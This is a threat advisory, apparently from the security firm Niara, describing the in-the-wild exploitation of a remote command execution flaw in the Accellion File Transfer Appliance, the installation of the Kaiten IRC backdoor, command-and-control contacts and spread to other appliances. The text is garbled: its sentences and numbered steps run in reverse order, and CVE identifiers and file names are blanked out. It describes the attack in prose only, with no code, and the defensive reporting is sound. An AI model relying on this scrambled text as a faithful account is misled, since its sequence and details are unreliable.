Once was downloaded, it was decompressed and unzipped. The attackers then issued commands to download a compressed archive file () that contained all the tools and blueprint for exploiting the CVE (e.g., ports scanner, binaries to conduct the exploits, instructions, etc.). The backdoor served as the primary channel for cyber criminals to issue commands to the compromised server via the IRC protocol. 2ģ Technical Analysis The attackers downloaded Kaiten, a well-known IRC backdoor, on the compromised Accellion FTA. Perform the exploit to compromise other vulnerable Accellion FTAs Figure 1: Visualization of the attack Copyright 2015 Niara, Inc. Download LoRD of IRAN HACKERS backdoor 5. Download exploit tools and instructions from another C&C server 4. Connect to a command and control (C&C) server 3. Install IRC backdoor on compromised Accellion FTA 2. The common vulnerabilities and exposure (CVE) identifier of this vulnerability is CVE Copyright 2015 Niara, Inc. However due to different patch cycles within organizations, the vulnerability remains. Accellion quickly released updated software (FTA_9_11_210) to address this vulnerability. This vulnerability is present in appliance software version FTA_9_11_200 and likely all prior versions. This is made possible due to insufficient sanitation of the oauth_ token parameter and how file permissions are configured by default. In mid-2015, Rapid 7 discovered a remote command execution (RCE) vulnerability on the Accellion FTA, which could give cyber criminals near-complete access to the appliance, potentially resulting in the exfiltration of secure files. What is the Accellion Secure File Transfer Appliance vulnerability? The Accellion FTA provides secure file sharing and transfer for both internal and external recipients. While the motivation for this is not known, any compromise of a server storing important files should be taken very seriously. The Accellion FTA was being used as a beachhead to launch further attacks on other Accellion FTAs and create a cluster of compromised servers. CVE is the Accellion File Transfer Appliance (FTA) vulnerability, discovered by Rapid 7 in mid Late last month, Niara s security researchers identified a compromised Accellion FTA within an organization. For more details on Niara s capabilities or to schedule a demo to see Niara in action, contact us at or at What did Niara discover? Niara has discovered (as far as we know) the first sighting of CVE in the wild. Niara s security analytics platform provides a rich set of capabilities to automatically find attacks on the inside that evaded real-time defense systems and focus security teams efforts on the threats that matter. 1 Threat Advisory: Accellion File Transfer Appliance Vulnerability Niara Threat Advisories provide timely information regarding new attacks along with how Niara helps companies quickly detect an attack to limit its impact and prevent it from establishing a persistent presence within the organization.
0 kommentar(er)
